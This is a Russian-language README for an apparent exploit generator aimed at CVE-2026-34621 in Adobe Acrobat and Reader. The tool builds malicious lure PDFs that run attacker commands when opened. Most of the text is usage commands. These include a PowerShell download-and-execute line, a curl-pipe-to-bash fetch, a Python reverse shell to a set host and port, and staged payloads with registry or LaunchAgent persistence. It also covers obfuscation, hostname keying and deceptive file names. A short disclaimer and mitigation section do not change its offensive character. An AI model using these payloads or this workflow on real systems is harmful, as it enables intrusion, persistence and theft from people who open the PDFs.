
Сложный кроссплатформенный генератор эксплойтов для **CVE-2026-34621** — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и произвольному выполнению кода в Windows и macOS.
Сложный кроссплатформенный генератор эксплойтов для CVE-2026-34621 — критической уязвимости загрязнения прототипа в Adobe Acrobat и Reader, которая приводит к обходу песочницы и выполнению произвольного кода в Windows и macOS.
⚠️ ВАЖНОЕ ПРЕДУПРЕЖДЕНИЕ
Этот инструмент предназначен только для авторизованных исследований в области безопасности и пентеста.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным. Автор не несёт ответственности за неправомерное использование.
CVE-2026-34621 — это уязвимость нулевого дня в Adobe Acrobat и Reader, которая позволяет атакующему:
Этот генератор создаёт вредоносный PDF-файл, который при открытии в уязвимой версии Adobe Reader автоматически выполняет полезную нагрузку, адаптированную под операционную систему жертвы.
Поддерживаемые целевые платформы:
| Категория | Возможности |
|---|---|
| Кроссплатформенные полезные нагрузки | Автоматическое определение ОС и выбор соответствующего метода выполнения команд Windows или macOS. |
| Несколько векторов выполнения | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS). |
| Поэтапные полезные нагрузки | Загрузка и выполнение полезных нагрузок второго этапа с удалённого URL-адреса. |
| Постоянство | Установка ключа автозагрузки в реестре (Windows) или LaunchAgent (macOS). |
| Методы обхода | Три уровня обфускации JavaScript, привязка к окружению, задержки выполнения, полиморфный код. |
| Встраивание в PDF-приманку | Объединение эксплойта с легитимно выглядящим PDF-файлом (требуется PyPDF2). |
| Несколько триггеров | OpenAction, действие при открытии страницы или JavaScript на уровне документа. |
| Подробные отчёты | Отчёты в форматах HTML, TXT и JSON с описанием конфигурации полезной нагрузки. |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
Основной скрипт использует только стандартную библиотеку Python. Для функции объединения с PDF-приманкой установите PyPDF2:
pip install PyPDF2
Сгенерируйте базовый PDF-файл, который открывает калькулятор в Windows и macOS:
python3 cve_2026_34621_advanced.py -o test.pdf
Будут созданы следующие файлы:
test.pdf — вредоносный PDF-файл.
test_report.html — подробный HTML-отчёт.
test_report.txt — текстовое резюме.
test_config.json — экспорт конфигурации в JSON.
Команды для Windows
1-Сценарий Команда
A-Базовое всплывающее окно calc.exe
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
Обратная оболочка PowerShell
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
Поэтапная полезная нагрузка с постоянством
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
Привязка к окружению (запуск только на "SALES-PC")
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
С уровнем обфускации 2 и задержкой 10 секунд
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
Команды для macOS
2-Сценарий Команда
Открыть калькулятор
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
Загрузка и выполнение скрипта
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Обратная оболочка через Python
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
Постоянство через LaunchAgent
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
Встраивание в PDF-приманку
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-Примечание о мобильном тестировании
Сам скрипт запускается на настольных системах (Windows/macOS/Linux) для генерации PDF-файла. Сгенерированный PDF можно открыть на устройствах Android или iOS, но:
Мобильные версии Adobe Acrobat Reader не уязвимы к CVE-2026-34621.
Вместо выполнения системных команд полезная нагрузка запустит безобидный демонстрационный запасной вариант (откроет URL-адрес или покажет предупреждение).
Параметр Описание
-o, --output FILE Обязательный. Имя выходного PDF-файла.
--win CMD Команда Windows для выполнения (по умолчанию: calc.exe).
--mac CMD Команда macOS для выполнения (по умолчанию: open /System/Applications/Calculator.app).
--stage URL URL-адрес для загрузки полезной нагрузки второго этапа.
-p, --persistence Установка механизма постоянства (реестр/LaunchAgent).
-O, --obfuscate LEVEL Уровень обфускации JavaScript (0=нет, 1=базовый, 2=средний, 3=продвинутый).
-d, --delay SECONDS Задержка выполнения на указанное количество секунд.
-k, --key HOSTNAME Привязка к окружению — выполнение только при совпадении имени хоста.
-l, --lure PDF Путь к легитимному PDF-файлу для использования в качестве приманки (объединяет эксплойт).
--trigger TYPE Вектор запуска: openaction, pageopen или doclevel.
--no-reports Пропустить генерацию отчётов HTML/TXT/JSON.
--seed N Установить начальное значение генератора случайных чисел для воспроизводимой полиморфной генерации.
Цепочка атаки
Загрязнение прототипа:
Встроенный JavaScript изменяет Object.prototype для внедрения вредоносных свойств (__trusted, privileged и т. д.). Это нарушает границу доверия JavaScript-движка Adobe.
Повышение контекста
Из-за загрязнённого прототипа движок ошибочно обрабатывает недоверенный JavaScript документа так, как если бы он выполнялся в привилегированном контексте.
Доступ к привилегированным API
Скрипт теперь может вызывать ограниченные API, такие как app.launchURL, util.readFileIntoStream и app.trustedFunction.
Обход песочницы
Эти API обеспечивают доступ к файловой системе и выполнение процессов за пределами песочницы Adobe.
Выполнение произвольного кода
Скрипт выполняет команду атакующего с помощью методов, зависящих от ОС:
Windows: cmd.exe /c, PowerShell или WScript.Shell.
macOS: обработчик URL Terminal.app или osascript.
Уровни обфускации
Уровень Описание
0 Без обфускации — обычный читаемый JavaScript.
1 Строковые литералы преобразуются в String.fromCharCode, имена переменных рандомизируются.
2 Уровень 1 + внедрение мёртвого кода и мусорных комментариев.
3 Весь скрипт кодируется в base64 и оборачивается в eval(atob(...)), затем повторно обфусцируется.
Продукт Канал Уязвимые версии Исправленная версия
Adobe Acrobat DC Continuous ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC Continuous ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 Classic ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)
Немедленно обновитесь: установите последние обновления безопасности от Adobe.
Отключите JavaScript в Adobe Reader: Правка → Настройки → JavaScript → снимите флажок «Включить JavaScript в Acrobat» (обратите внимание: это нарушает некоторые функции PDF).
Используйте альтернативные просмотрщики PDF: рассмотрите возможность использования браузеров или сторонних просмотрщиков, которые не затронуты уязвимостью.
Приветствуется участие в разработке, но обратите внимание:
Все запросы на включение изменений должны касаться оборонительных исследований, улучшения обнаружения или улучшения отчётности.
Мы не принимаем изменения, которые повышают атакующие возможности инструмента сверх необходимого для легитимного тестирования.
Чтобы внести вклад:
Сделайте форк репозитория.
Создайте ветку для новой функции.
Отправьте запрос на включение изменений с чётким описанием внесённых изменений.
Этот проект предоставляется только для образовательных целей и авторизованного тестирования безопасности.
Используя это программное обеспечение, вы соглашаетесь с тем, что несёте ответственность за соблюдение всех применимых законов и нормативных актов.
Автор снимает с себя всю ответственность за любое неправомерное использование или ущерб, причинённый этим инструментом.